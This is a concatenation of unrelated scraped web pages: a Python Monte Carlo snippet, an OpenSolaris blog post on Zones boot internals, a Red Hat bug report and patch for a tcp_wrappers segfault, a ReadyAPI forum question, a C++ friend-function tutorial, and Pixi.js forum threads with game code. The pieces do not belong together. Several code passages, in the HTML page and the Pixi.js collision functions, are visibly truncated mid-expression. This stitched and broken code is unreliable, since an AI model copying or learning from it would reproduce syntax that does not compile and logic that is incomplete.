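As a taste of the Monte Carlo idea mentioned above (my sketch, not the post's code), historical daily returns can be resampled at random to project a distribution of possible future prices:

```python
import random

def simulate_final_prices(start_price, daily_returns, days=30, n_paths=1000, seed=42):
    """Resample historical daily returns to build n_paths possible price
    paths, returning each path's final price."""
    rng = random.Random(seed)  # fixed seed for reproducibility
    finals = []
    for _ in range(n_paths):
        price = start_price
        for _ in range(days):
            price *= 1 + rng.choice(daily_returns)
        finals.append(price)
    return finals

returns = [0.01, -0.02, 0.005, 0.03, -0.01]  # toy daily returns, not real data
finals = simulate_final_prices(7000.0, returns)
print(len(finals), min(finals) > 0)  # 1000 True
```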
https://numex-blog.com/scraping-websites-for-historical-bitcoin-data-using-python/
These Boots are Made for Walkin' By User12607341-Oracle on Jun 14, 2005 One of the most gratifying and exciting aspects of the OpenSolaris project is a return (for me, at least) to working on operating system design and research with the larger, open community. In another era while I was an undergraduate at Berkeley, I was fortunate enough to see the 2.x and 4.x BSD development effort up close and to see the larger community formed between the University and external organizations that had UNIX source licenses. It was not an open source community, of course, but it was a community none the less, and one that shared fixes, ideas and other software projects built on top of the operating system. Our hopes for OpenSolaris are that in addition to releasing operating system source code that can be used for many different purposes, Sun and the community will innovate together while maintaining the core values that Solaris provides today. One of the many pieces of OpenSolaris which is of personal interest is the Zones virtualization technology introduced in Solaris 10. Zones provide a lightweight but very efficient and flexible way of consolidating and securing potentially complex workloads. There is a wealth of technical information about Zones in Solaris available at the OpenSolaris Zones Community and the BigAdmin System Administration Portal. One of the things about Zones that people notice right away is how quickly they boot. Of course, booting a zone does not cause a system to run its power-on self-test (POST) or require the same amount of initialization that takes place when the hardware itself is booting. However, I thought it might be useful to do a tour of the dance that takes place when a non-global zone is booted. I call it a dance since there is a certain amount of interplay between the primary players - zoneadm, zoneadmd and the kernel itself - that warrants an explanation. 
Although the virtualization that Zones provides is spread throughout the source code, the primary implementation in the kernel can be found in zone.c. As with many OpenSolaris frameworks, there is a big block comment at the start of the file which is very useful for understanding the lay of the land with respect to the code. Besides describing the data structures and locking strategy used for Zones, there is a description of the states a zone can be in from the kernel's perspective, and of the points at which a zone may transition from one state to another. For brevity, only the states covered during a zone boot are listed here:

 ...
 * Zone States:
 *
 * The states in which a zone may be in and the transitions are as
 * follows:
 *
 * ZONE_IS_UNINITIALIZED: primordial state for a zone. The partially
 * initialized zone is added to the list of active zones on the system but
 * isn't accessible.
 *
 * ZONE_IS_READY: zsched (the kernel dummy process for a zone) is
 * ready. The zone is made visible after the ZSD constructor callbacks are
 * executed. A zone remains in this state until it transitions into
 * the ZONE_IS_BOOTING state as a result of a call to zone_boot().
 *
 * ZONE_IS_BOOTING: in this short-lived state, zsched attempts to start
 * init. Should that fail, the zone proceeds to the ZONE_IS_SHUTTING_DOWN
 * state.
 *
 * ZONE_IS_RUNNING: The zone is open for business: zsched has
 * successfully started init. A zone remains in this state until
 * zone_shutdown() is called.
 ...

It is important to note that there are a number of zone states not represented here - those are for zones which do not (yet) have a kernel context. An example of such a state is a zone that is in the process of being installed. These states are defined in libzonecfg.h.

One of the players in the zone boot dance is the zoneadmd process, which runs in the global zone and performs a number of critical tasks.
Although much of the virtualization for a zone is implemented in the kernel, zoneadmd manages a great deal of a zone's infrastructure, as outlined in zoneadmd.c:

/*
 * zoneadmd manages zones; one zoneadmd process is launched for each
 * non-global zone on the system.  This daemon juggles four jobs:
 *
 * - Implement setup and teardown of the zone "virtual platform": mount and
 *   unmount filesystems; create and destroy network interfaces; communicate
 *   with devfsadmd to lay out devices for the zone; instantiate the zone
 *   console device; configure process runtime attributes such as resource
 *   controls, pool bindings, fine-grained privileges.
 *
 * - Launch the zone's init(1M) process.
 *
 * - Implement a door server; clients (like zoneadm) connect to the door
 *   server and request zone state changes.  The kernel is also a client of
 *   this door server.  A request to halt or reboot the zone which originates
 *   *inside* the zone results in a door upcall from the kernel into zoneadmd.
 *
 *   One minor problem is that messages emitted by zoneadmd need to be passed
 *   back to the zoneadm process making the request.  These messages need to
 *   be rendered in the client's locale; so, this is passed in as part of the
 *   request.  The exception is the kernel upcall to zoneadmd, in which case
 *   messages are syslog'd.
 *
 *   To make all of this work, the Makefile adds -a to xgettext to extract
 *   *all* strings, and an exclusion file (zoneadmd.xcl) is used to exclude
 *   those strings which do not need to be translated.
 *
 * - Act as a console server for zlogin -C processes; see comments in zcons.c
 *   for more information about the zone console architecture.
 *
 * DESIGN NOTES
 *
 * Restart:
 * A chief design constraint of zoneadmd is that it should be restartable in
 * the case that the administrator kills it off, or it suffers a fatal error,
 * without the running zone being impacted; this is akin to being able to
 * reboot the service processor of a server without affecting the OS instance.
 */

When a user wishes to boot a zone, zoneadm will attempt to contact zoneadmd via a door that is used by all three components for a number of things, including coordinating zone state changes. If for some reason zoneadmd is not running, an attempt will be made to start it. Once that has completed, zoneadm tells zoneadmd to boot the zone by supplying the appropriate zone_cmd_arg_t request via a door call. It is worth noting that the same door is used by zoneadmd to return messages back to the user executing zoneadm, and also as a way for zoneadm to indicate to zoneadmd the locale of the user executing the boot command so that messages are localized appropriately.

Looking at the door server that zoneadmd implements, there is some straightforward sanity checking that takes place on the argument passed via the door call, as well as the use of some of the technology that came in with the introduction of discrete privileges in Solaris 10:

	if (door_ucred(&uc) != 0) {
		zerror(&logsys, B_TRUE, "door_ucred");
		goto out;
	}
	eset = ucred_getprivset(uc, PRIV_EFFECTIVE);
	if (ucred_getzoneid(uc) != GLOBAL_ZONEID ||
	    (eset != NULL ? !priv_ismember(eset, PRIV_SYS_CONFIG) :
	    ucred_geteuid(uc) != 0)) {
		zerror(&logsys, B_FALSE, "insufficient privileges");
		goto out;
	}

	kernelcall = ucred_getpid(uc) == 0;

	/*
	 * This is safe because we only use a zlog_t throughout the
	 * duration of a door call; i.e., by the time the pointer
	 * might become invalid, the door call would be over.
	 */
	zlog.locale = kernelcall ? DEFAULT_LOCALE : zargp->locale;

Using door_ucred, the user credential can be checked to determine whether the request originated in the global zone,[1] whether the user making the request had sufficient privilege to do so,[2] and whether the request was the result of an upcall from the kernel. That last piece of information is used, among other things, to determine whether or not messages should be localized by localize_msg.

It is within the door server implemented by zoneadmd that transitions from one state to another take place. There are two states from which a zone boot is permissible: installed and ready. From the installed state, zone_ready is used to create and bring up the zone's virtual platform, which consists of the zone's kernel context (created using zone_create) as well as the zone's specific file systems (including the root file system) and logical networking interfaces. If a zone is supposed to be bound to a non-default resource pool, that binding also takes place as part of this state transition.

When a zone's kernel context is created using zone_create, a zone_t structure is allocated and initialized. At this time, the status of the zone is set to ZONE_IS_UNINITIALIZED. Some of the initialization that takes place sets up the security boundary which isolates processes running inside a zone. For example, the vnode_t of the zone's root file system, the zone's kernel credentials and the privilege sets of the zone's future processes are all initialized here. Before returning to zoneadmd, zone_create adds the primordial zone to a doubly-linked list and two hash tables,[3] one hashed by zone name and the other by zone ID. These data structures are protected by the zonehash_lock mutex, which is dropped after the zone has been added. Finally, a new kernel process, zsched, is created; it is where kernel threads for this zone are parented.
After calling newproc to create this kernel process, zone_create will wait using zone_status_wait until the zsched kernel process has completed initializing the zone and has set its status to ZONE_IS_READY. Since the initialization of the process's user structure has not been completed, the first thing the new zsched process does is finish that initialization, along with reparenting itself to PID 1 (the global zone's init process). And since the future processes to be run within the new zone may be subject to resource controls, that initialization takes place here in the context of zsched. After grabbing the zone_status_lock mutex in order to set the status to ZONE_IS_READY, zsched will then suspend itself, waiting for the zone's status to be changed to ZONE_IS_BOOTING.

Once the zone is in the ready state, zone_create returns control back to zoneadmd, and the door server continues the boot process by calling zone_bootup. This initializes the zone's console device, mounts some of the standard OpenSolaris file systems like /proc and /etc/mnttab, and then uses the zone_boot system call to attempt to boot the zone. As the comment that introduces zone_boot points out, most of the heavy lifting has already been done either by zoneadmd or by the work the kernel has done through zone_create. At this point, zone_boot saves the requested boot arguments after grabbing the zonehash_lock mutex, and then further grabs the zone_status_lock mutex in order to set the zone status to ZONE_IS_BOOTING. After dropping both locks, zone_boot suspends itself, waiting for the zone status to be set to ZONE_IS_RUNNING.

Since the zone's status has now been set to ZONE_IS_BOOTING, zsched continues where it left off after suspending itself with its call to zone_status_wait_cpr. After checking that the current zone status is indeed ZONE_IS_BOOTING, a new kernel process is created in order to run init in the zone.
This process calls zone_icode, which is analogous to the traditional icode function that is used to start init in the global zone and in traditional UNIX environments. After doing some zone-specific initialization, each of the icode functions ends up calling exec_init to actually exec the init process, after copying out the path to the executable, /sbin/init, and the boot arguments. If the exec is successful, zone_icode will set the zone's status to ZONE_IS_RUNNING, and in the process, zone_boot will pick up where it had been suspended. At this point, the value of zone_boot_err indicates whether the zone boot was successful or not, and is used to set the global errno value for zoneadmd.

There are two additional things to note about the zone's transition to the running state. First of all, audit_put_record is called to generate an event for the Solaris auditing system, so that it is known which user executed which command to boot a zone. In addition, there is an internal zoneadmd event generated to indicate on the zone's console device that the zone is booting. This internal stream of events is sent by the door server to the zone console subsystem for all state transitions, so that the console user can see which state the zone is transitioning to.

[1] This is a bit of defensive programming, since unless the global zone administrator were to make the door in question available through the non-global zone's own file system, there would be no way for a privileged user in a non-global zone to actually access the door used by zoneadmd.

[2] zoneadm itself checks that the user attempting to boot a zone has the necessary privilege, but it's possible some other privileged process in the global zone might have access to the door but lack the necessary PRIV_SYS_CONFIG privilege.

[3] The doubly-linked list implementation was integrated by Dave while Dan was responsible for the hash table implementation. Both of these are worth examining in the OpenSolaris source base.
https://blogs.oracle.com/comay/entry/these_boots_are_made_for
Red Hat Bugzilla – Bug 141110: bug in table_match leads to segfault of process executing hosts_ctl
Last modified: 2007-11-30 17:10:55 EST

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0

Description of problem:
It first occurred with the slapd daemon when I tried to run a stress test on an LDAP server. If one opens too many connections to the slapd process, slapd will eventually receive SIGSEGV. The last message submitted to the log before the crash is:

slapd[xxxx]: warning: cannot open /etc/hosts.allow: Too many open files

When I started to investigate that, I found out that the crash happens due to the following bug in the table_match function in tcp_wrappers:

int table_match(...)
{
    /* sh_cmd variable is declared but not initialized here */
    match = NO;
    ...
    if ((fp = open()) != 0) {
        ...
        /* Initialize sh_cmd here */
        ...
    } else if (errno != ENOENT) {
        tcpd_warn();
        match = ERR;
    }
    if (match) {
        /* Use sh_cmd here */
    }
    ...
}

So the developer assumed that the match variable would be equal to YES in the later if, but the test only checks that it is non-zero.
The following patch fixes this problem:

--- tcp_wrappers_7.6/hosts_access.c.orig	2004-11-29 15:16:26.532074984 +0300
+++ tcp_wrappers_7.6/hosts_access.c	2004-11-29 15:15:47.500008760 +0300
@@ -177,7 +177,7 @@
 	tcpd_warn("cannot open %s: %m", table);
 	match = ERR;
     }
-    if (match) {
+    if (match == YES) {
 	if (hosts_access_verbose > 1)
 	    syslog(LOG_DEBUG, "matched: %s line %d",
 		   tcpd_context.file, tcpd_context.line);

Version-Release number of selected component (if applicable): tcp_wrappers-7.6-37.2

How reproducible: Always

Steps to Reproduce:
1. Make sure that you have hosts.allow and hosts.deny
2. Run slapd with a DB large enough
3. Load it heavily, with something like this:
   while /bin/true; do ldapsearch -x "objectClass=*"; done

Actual Results: slapd crashes

Additional info:
Created attachment 107553 [details] should fix this issue

After studying the .spec file I'd like to add a few more comments:

1) This bug was introduced by tcp_wrappers-7.6-sig.patch.

2) Another misbehaviour was added by that patch in the hosts_access function. Originally its tail was:

    if (table_match(hosts_allow_table, request))
        return (YES);
    if (table_match(hosts_deny_table, request))
        return (NO);
    return (YES);

After tcp_wrappers-7.6-sig.patch it turned into:

    if (table_match(hosts_allow_table, request))
        return (YES);
    if (table_match(hosts_deny_table, request) == NO)
        return (YES);
    return (NO);

But it should be:

    if (table_match(hosts_allow_table, request) == YES)
        return (YES);
    if (table_match(hosts_deny_table, request) == NO)
        return (YES);
    return (NO);

A patch to tcp_wrappers-7.6-37.2 which will fix both issues is attached to this comment.

Fixed in rawhide in rpm tcp_wrappers-7.6-39 or newer.
https://bugzilla.redhat.com/show_bug.cgi?id=141110
Hi, is it possible to count the number of rows fetched by a data source in ReadyAPI? Can it be stored in a variable to use in the next steps? Thanks!

Hi @MKV,

Try the code below:

DSrowCount = testRunner.testCase.testSteps["DataSource"].rowCount
log.info DSrowCount

Thanks,
Himanshu Tayal

Thanks.. It worked!!

The problem is that rowCount does not return the actual row count, in my case 200. I have to run my data source step manually first to create the rows, and then rowCount will return the actual row count. When I try to automate this with:

def tst = testRunner.runTestStepByName("myDataSource")
DSrowCount = testRunner.testCase.testSteps["myDataSource"].rowCount
log.info DSrowCount

it does not work. There are 200 rows in the data source, but rowCount returns 1. Is there any way to make rowCount return 200 instead of 1? Thanks
https://community.smartbear.com/t5/SoapUI-Pro/how-to-count-the-number-of-rows-fetched-in-data-source/m-p/170700/highlight/true
Friend Function in C++

In this tutorial, we will learn about the friend function in C++ and what it is used for. Let us see some example programs.

What is a friend function?

- A friend function is a non-member function of a class which can access the private members/data of the class.
- It is declared using the keyword friend inside every class whose private data it needs to access.
- It is defined outside of any class, without using the friend keyword or the scope resolution operator.
- A friend function is called without using any object.

Class Member Function friends

Here are examples of class member functions declared as friends:

class DayOfYear
{
    friend Date::Date(const class DayOfYear&);
    friend Date::operator DayOfYear();
    // ...
};

The friend declaration uses the class keyword to make a forward reference to a class which has not been defined yet. This technique works because the DayOfYear class needs no details of the implementation of the Date class. To declare specific member functions as friends, the definition of the class with the member functions must be in scope. In this case, this means the Date class must be defined before the DayOfYear class.

Non-member Function friends

A class can specify that a non-member function in the program is a friend to the class, as in this example:

class Time
{
    // ...
    friend void display(const Date&, const Time&);
};

// -- non-member function
void display(const Date& dt, const Time& tm)
{
    // has access to the private members
    // of Date and Time objects
}

Program designs often use functions that are members of neither class to bridge objects of two classes and perform some action that involves both classes' data members. Sometimes those functions are member functions of a third class, and other times they are non-member functions. Overloaded operator functions are frequently non-member functions that are declared as friends of the classes upon which the overloaded operators work.
Program to implement friend function in C++

#include <iostream>
using namespace std;

class A
{
private:
    int a, b;
public:
    void getData()
    {
        cout << "\n Enter any integers :";
        cin >> a >> b;
    }
    friend void display(A);
};

void display(A a1)
{
    cout << "\n a: " << a1.a << "\n b : " << a1.b;
}

int main()
{
    A a;
    a.getData();
    display(a);
    return 0;
}

Output from the program:

Enter any integers: 4 5
a: 4
b: 5
https://www.codespeedy.com/friend-functions-in-cpp/
Is my way of creating objects correct?

Hi BobF, I noticed that as well. I finally settled on using the prototype approach when I deal with objects I plan to create multiple times, and the modular approach when I deal with classes I don't have to instantiate multiple times. At least, this is what makes sense to me. Thanks a lot for the input!

define([], function() {
    var MyClass = (function() {
        var x = "Hello World!";
        var MyClass = function(){};
        MyClass.prototype.sayHello = function() {
            console.log(x);
        };
        MyClass.prototype.setHelloMessage = function(mes) {
            x = mes;
        };
        return MyClass;
    })();

    return {
        create : function() {
            return MyClass();
        }
    };
});

I finally came up with this approach, going back to basics. I need to conserve memory because it is of utmost importance in the project we are working on. I still need to work on the return, though, but we are working on it. Thank you very much!

Wow, thanks for this, BobF. It finally came to my senses what prototype is for. It means that those functions would otherwise be created for each instance, but if they are on the prototype, all instances use one copy of those functions. Since functions are also treated as objects, this can be a problem in terms of RAM. The member variables of the object are then referenced by 'this', which I had largely avoided, as it convoluted my code in my early attempts at JavaScript. Thanks for the insight.

How to create a circular cooldown effect?

neonwarge04 posted a topic in Pixi.js

I am struggling; the only resource I found is this. I have not dealt with the code yet, but only with concepts for how to deal with it.
So the thought I came up with is to create a circle via PIXI.Graphics and make it a mask on another black, transparent graphics object. The thing is, I want my circle mask to look like a degrading pie chart over time. I need it to be like this for a reason, not like the one in the link. Basically, what I am asking is this: how can I make a circle fan left and fan right (I don't know if I am using the right term)? I need to draw a fanning effect so I can create a cooldown effect, and not just this, but some other cool stuff like loading indicators similar to Imgur's, regardless of the shape of my object of interest. Here is what I came up with:

This is fairly easy to do in Pixi.js or any other similar renderer library out there. But how can I make my circle have a pie slice like this, and have it grow over time, so I can make something like this (not just specifically this, by the way)?

I don't want code, by the way, just the concept. I really can't get my head wrapped around this thing. I don't even know what it's properly called (aside from calling it a circular cooldown effect), which makes me even more frustrated. I need help! Thanks!

Performance on Android 4.1.2 with Cordova 5.4.1 with Crosswalk 1.4.0

neonwarge04 replied to neonwarge04's topic in Pixi.js

That's the thing: I cannot use Ludei CocoonJS; it is required to stick with Cordova for some reason.

Hi, I am kind of frustrated since I cannot get my app to run smoothly on a phone running Android 4.1.2. It only gives me 8-11 fps. I am using the Cordova-Crosswalk plugin; it works fine on a higher-end phone, but this is just a very simple game, and yet it cannot run on lower-end devices. Can you provide some ideas on what else I might be missing here? Thank you!

[YES OR NO] Pixi.js + Require.js + PhoneGap

neonwarge04 posted a topic in Pixi.js

Would this work? I think I am giving up on this HTML5 JavaScript mobile development. This is such a pain in the a$$ to work with. I am forced to use it anyway.
I could have used something else, but I can't. Is there a way for me to make this work through PhoneGap? I've been rejected for using Cocoon.js; all I get are smirking faces, as if Cocoon.js were infected with Ebola. I am stuck with PhoneGap. Have you tried getting a Pixi.js app to work with PhoneGap? If so, how?

Pixi.js with PhoneGap?

neonwarge04 posted a topic in Pixi.js

Hi, I am having difficulty with PhoneGap and Pixi.js. I can't seem to see my renderer.view on the screen. It just shows the text "Hello World and Hello Universe" and a white screen. This should be basically simple. I tried to modify the files and trim the bloatware scripts that I don't even need. It is working, but I can't see the renderer (my game, for that matter). What else have I missed? The documentation is not helping me either, anyway:

<!DOCTYPE html>
<!-- Copyright (c) 2012-2014" />
<script data-</script>
<title>Hello World</title>
<style>
    body {
        margin: 0;
        padding: 0;
    }
    #gamediv {
        width: 100%;
        height: auto;
        margin: 0;
        padding: 0;
    }
</style>
</head>
<body>
    <script type="text/javascript" src="cordova.js"></script>
    <script type="text/javascript" src="js/index.js"></script>
    <script type="text/javascript">
        app.initialize();
    </script>
    <div id="gamediv">
        Hello World and Hello Universe!!!
    </div>
</body>
</html>

Please let me know if you need more source files to check out. Thank you!

How can I handle sprite coordinates when the container they belong to is scaled? I am trying to resize my game app based on the size of the screen, but the scaling seems to disrupt my toon's grid location. This only occurs when I resize (scale) the game to fit the device screen. What I am trying to do is this: I have two containers, MainContainer and SubContainer. MainContainer is what I use generally for the common view, for example placing some UI parts. SubContainer is what I use to pan the world around. I have been successful with this setup, but it breaks when I scale the screen to fit the device. For instance, I am scaling the MainContainer.
Is there a solution for this? How am I supposed to handle this? What I have been thinking is to work out how many pixels the screen was scaled by, account for it, and apply the difference to every sprite, but I am not sure about this. Thanks for your help!

Exca, thank you for your reply! That's another way to put it! Also, I was able to figure out what was wrong. In fact, I was doing it wrong: I was checking limitX/Y via the global coordinates of the toon. This is wrong. I realized I only need the global coordinates of the toon, calculate the grid position based on that, and retrieve the colliding object from the sensor:

(function detectFloorCollision() {
    mLimit.y = getMostRoof(mGridPosition, 1);
    // I should be comparing mMovieClip's position inside the subcontainer
    if((mMovieClip!");
    }
}());

I realized I was comparing a global coordinate with a coordinate in the subcontainer. In fact, in-game, it doesn't really matter where the sprites are inside the subcontainer; this is completely irrelevant. My worry before was computing the y coordinate inside the subcontainer, which becomes increasingly negative as I go up; I can't compute the grid position given this data. Also, I replaced the code that gives me the location of the block sprite in the subcontainer, since I am computing its global position as well. In fact, I don't need the coordinates inside the subcontainer. My only concern is the position of the Toon in the global container while it is inside the subcontainer.
So here is what it looks like:

function getMostRoof(gridPosition, direction) {
    var gpos = {};
    gpos.x = gridPosition.x;
    gpos.y = gridPosition.y + (1 * direction);
    var block = mWorld.getBlock(gpos);
    var point = new PIXI.Point();
    if (block !== null) {
        if (!block.isSolid) {
            return getMostRoof({ x: gridPosition.x, y: gridPosition.y + (1 * direction) }, direction);
        } else {
            var limitY = 0;
            // same as before, get the position from the subcontainer and return that as limitY
            if (direction === 1) {
                mCurrentFloor = block;
                limitY = mCurrentFloor.y;
            } else {
                mCurrentRoof = block;
                limitY = mCurrentRoof.y + mWorld.blockSize;
            }
            return limitY;
        }
    } else {
        /*
         * Date: December 8, 2015
         * Note: Double check roof and floor bounds when no block detected.
         * Perhaps use the (0,0)/(0,n) most block and check collision against it?
         */
        return (direction === 1) ? mWorld.pixelHeight : mMovieClip.y - mWorld.pixelHeight;
    }
}

There you go! I got my game mechanics working so far. Thanks for your help!

This would fail, actually. My mainContainer doesn't have a parent. If I run it this way, it will throw an exception.

These are very helpful tips! Thank you! But I kind of give up; this is hopeless, I can't get it to work. If Pixi had something like SFML's mapping of pixels to coordinates, I could simply treat my sprite like a mouse pointer or something. I mean, ideally, I shouldn't have to handle the sprite getting 'off the screen'; this is stupid, especially in games meant for mobile, right? So I have to keep the coordinates of the sprite constant. I am forced to use two containers instead and pan just the second one. Now I am having a hard time making sure my toon's coordinates aren't jumping back and forth. Here is what I am currently doing; maybe you can help me with this? I am animating the pan, so every time the toon reaches a height of gridPosition.y >= 6, the entire world collapses and then pans upwards.
As I pan upwards (which means I pull the second container downwards pulling everything on it downwards) this causing disruption to my collision detection. If only I could get the correct coordinates of the sprite in the visible screen, this could have been possible. Here is the real mess I am dealing with: Toon.js define(['pixi' , 'core/utils/Keyboard', 'tween'], function(PIXI , Keyboard, TWEEN){ function Toon(world) { var mIsJumping = false; var mIsOnGround = true; var mGlobalContainer = world.globalContainer; var mContainer = world.container; var mPanHeight = 6; var mJumpSpeed = 640; var mMoveSpeed = 250 ; var mWorld = world; var mDirection = 1; var mVelocity = { x : mMoveSpeed , y : 0 }; var mGridPosition = { x : 0 , y : 0 }; var mPosition = { x : 0 , y : 0 }; var mSize = { width : 40 , height : 40 }; var mLimit = { x : 0 , y : 0 }; var mCurrentFloor = null; var mGravity = 28.8; var mIsDead = false; var mWallStickEnabled = false; var mIsWallSticking = false; var mIsTouchingLeftMostWall = false; var mIsTouchingRightMostWall = false; var mIsPannable = true; var mHighestHeightAttained = 0; var mCurrentBlocks = {}; var mCurrentLeftWall = null; var mCurrentRightWall = null; var mCurrentFloor = null; var mCurrentRoof = null; var mJumpKey = Keyboard(32); mJumpKey.press = function() { jump(); } var mMovieClip = new PIXI.extras.MovieClip(this.mAnimFrames); mMovieClip.animationSpeed = 0.3; mMovieClip.anchor.x = 0.5; mMovieClip.anchor.y = 0.5; mMovieClip.play(); mMovieClip.x = mPosition.x; mMovieClip.y = mPosition.y; mMovieClip.play(); var This = { get position(){ return mMovieClip.position; } , set position(position) { mMovieClip.position = position } , get x(){ return mMovieClip.x; } , get y(){ return mMovieClip.y; } , set x(x){ return mMovieClip.x = x; } , set y(y){ return mMovieClip.y = y; } , get global() { var point = new PIXI.Point(); point = mMovieClip.toGlobal(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; return point; } , get size(){ 
return mSize; } , get width(){ return mSize.width; } , get height(){ return mSize.height; } , update : update , jump : jump , get sprite() { return mMovieClip; } , get highestHeightAttained(){ return mHighestHeightAttained; } }; function update(elapsed) { TWEEN.update(elapsed); if(mIsPannable) { if(!mIsWallSticking) mVelocity.y += mGravity; else mVelocity.y = 60; mMovieClip.x += (mVelocity.x * elapsed) * mDirection; mMovieClip.y += mVelocity.y * elapsed; mGridPosition.x = Math.floor(This.global.x / mWorld.blockSize); mGridPosition.y = Math.floor(This.global.y / mWorld.blockSize); // console.log("Grid position : " + mGridPosition.x + ' x ' + mGridPosition.y); detectCollision(); } } function detectCollision() { (function detectFloorCollision() { mLimit.y = getMostRoof(mGridPosition , 1); if((This.global!"); } } }()); (function detectRoofCollision() { mLimit.y = getMostRoof(mGridPosition, -1); if((This.global.y - (mSize.height / 2)) <= mLimit.y) { mMovieClip.y = mLimit.y + (mSize.width / 2); mVelocity.y = 0.0; } }()); (function detectLeftWallCollision() { mLimit.x = getMostWall(mGridPosition , -1); if(This.global.x - (mSize.width / 2) <= (mLimit.x + mWorld.blockSize)) { mMovieClip.x = mLimit.x + mWorld.blockSize + (mSize.width / 2); mMovieClip.scale.x = 1; // check if jumping when on the edge of the wall if(mIsJumping && mVelocity.y > 0) { mVelocity.y = 0.0; mIsWallSticking = true; mIsJumping = false; mIsTouchingLeftMostWall = true; } } else { if(!mIsTouchingRightMostWall) mIsWallSticking = false; mIsTouchingLeftMostWall = false; } })(); (function detectMostRightWallCollision() { mLimit.x = getMostWall(mGridPosition , 1); if(This.global.x + (mSize.width / 2) >= mLimit.x) { mMovieClip.x = mLimit.x - (mSize.width / 2); mMovieClip.scale.x = -1; // check if jumping when on the edge of the wall if(mIsJumping && mVelocity.y > 0) { mVelocity.y = 0.0; mIsWallSticking = true; mIsJumping = false; mIsTouchingRightMostWall = true; } } else { if(!mIsTouchingLeftMostWall) 
mIsWallSticking = false; mIsTouchingRightMostWall = false; } })(); } function getMostWall(gridPosition , direction) { var gpos = {}; gpos.x = gridPosition.x + (1 * direction); gpos.y = gridPosition.y; var block = mWorld.getBlock(gpos); if(block !== null) { if(!block.isSolid) return getMostWall({x : gridPosition.x + (1 * direction) , y : gridPosition.y} , direction); else { var limitX = 0; var point = new PIXI.Point(); if(direction === 1) { mCurrentRightWall = block; point = mCurrentRightWall.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitX = point.x; } else { mCurrentLeftWall = block; point = mCurrentLeftWall.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitX = point.x; } return limitX; } } else { return (direction === 1)? mWorld.pixelWidth : -mWorld.blockSize; } } function getMostRoof(gridPosition , direction) { var gpos = {}; gpos.x = gridPosition.x; gpos.y = gridPosition.y + (1 * direction); var block = mWorld.getBlock(gpos); if(block !== null) { if(!block.isSolid) return getMostRoof({x : gridPosition.x , y : gridPosition.y + (1 * direction) } , direction); else { var limitY = 0; var point = new PIXI.Point(); if(direction === 1) { mCurrentFloor = block; point = mCurrentFloor.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitY = point.y; } else { mCurrentRoof = block; point = mCurrentRoof.getGlobalPosition(point); point.x += mGlobalContainer.x; point.y += mGlobalContainer.y; limitY = point.y + mWorld.blockSize; } return limitY; } } else { return (direction === 1)? 
mWorld.pixelHeight : 0;
        }
    }

    function jump() {
        if(mIsWallSticking) {
            mDirection = mDirection * -1;
            mVelocity.y = -mJumpSpeed;
            mIsJumping = true;
            mIsOnGround = false;
            mIsWallSticking = false;
        } else if(mIsOnGround) {
            mIsJumping = true;
            mIsOnGround = false;
            mVelocity.y = -mJumpSpeed;
        }
    }

    mWorld.onPanFinished = function() {
        mIsPannable = true;
        mMovieClip.y -= mPanHeight * mWorld.blockSize;
    };

    mMovieClip.x = (mWorld.startingBlock.x + (mWorld.blockSize / 2));
    mMovieClip.y = (mWorld.startingBlock.y + (mWorld.blockSize / 2)) + (mSize.height / 2);
    mHighestHeightAttained = Math.floor(mMovieClip.y / mWorld.blockSize);

    return This;
}

return {
    create : function(stage , screenSize) {
        return Toon(stage , screenSize);
    }
};});

World.js

define(['tween', 'src/Segment', 'src/Block'] , function(TWEEN, Segment, Block){

function World(stage, globalContainer, screenSize) {
    var mScreenSize = screenSize;
    var mStage = stage;
    var mGlobalContainer = globalContainer;
    var mBlockSize = 82;
    var mSize = {width : 0 , height : 0};
    var mLevelSegmentsLookup = [];
    var mBlockPool = [];
    var mVoidPool = [];
    var mOpenedDoorPool = [];
    var mClosedDoorPool = [];
    var mQueueArea = [];
    var mPlayArea = [];
    var mPlayAreaHolder = [];
    var mLevels = [];
    var mOnPanFinished = function(){};
    var mStartingBlock = null;

    var This = {
        init : init
        , get blockSize(){ return mBlockSize; }
        , get startingBlock(){ return mStartingBlock; }
        , getBlock : getBlock
        , borrowBlock : borrowBlock
        , returnBlock : returnBlock
        , update : update
        , collapse : collapse
        , get size(){ return mSize; }
        , get width(){ return mSize.width; }
        , get height(){ return mSize.height; }
        , get pixelWidth(){ return mSize.width * mBlockSize; }
        , get pixelHeight(){ return mSize.height * mBlockSize; }
        , get globalContainer(){ return mGlobalContainer; }
        , get container(){ return mStage; }
        , get onPanFinished(){ return mOnPanFinished; }
        , set onPanFinished(callback){ mOnPanFinished = callback; }
    };

    ...
    function removeSegmentFromBottom(count) {
        for(var i = 0; i < count; ++i) {
            var part = mPlayArea.pop();
            for(var x = 0; x < part.length; ++x) {
                var block = part[x];
                block.invalidate(mStage);
                returnBlock(block);
            }
        }
        mSize.height = mPlayArea.length;
        mSize.width = mPlayArea[0].length;
    }

    function addSegmentToTop(count) {
        var previousHeight = mPlayArea[0][0].y;
        for(var y = 0; y < count; y++) {
            if(mQueueArea.length === 0) {
                var randomQueuedLevel = randomWithinRange(0, mLevels.length - 1);
                var additionalLevel = makeLevel(mLevels[randomQueuedLevel].slice() , false).data;
                mQueueArea = mQueueArea.concat(additionalLevel);
            }
            var newPart = mQueueArea.pop();
            for(var x = 0; x < newPart.length; ++x) {
                var block = newPart[x];
                if(block.sprite !== null) {
                    block.x = x * mBlockSize;
                    block.y = ((y + 1) * -mBlockSize) + previousHeight;
                    block.gx = x;
                    block.gy = y;
                    mStage.addChild(block.sprite);
                }
            }
            mPlayArea.unshift(newPart);
        }
        refreshGridPositions();
        mSize.height = mPlayArea.length;
        mSize.width = mPlayArea[0].length;
    }

    function refreshGridPositions() {
        for(var y = 0; y < mPlayArea.length; ++y) {
            for(var x = 0; x < mPlayArea[y].length; ++x) {
                var block = mPlayArea[y][x];
                block.gx = x;
                block.gy = y;
            }
        }
    }

    function update(elapsed) {
        TWEEN.update();
        // mStage.position.y += elapsed * 60;
    }

    function collapse(times) {
        addSegmentToTop(times);
        // mStage.position.y += times * mBlockSize;
        // removeSegmentFromBottom(times);
        // if(mOnPanFinished) mOnPanFinished();
        var positionY = mStage.position.y;
        new TWEEN.Tween({y : 0})
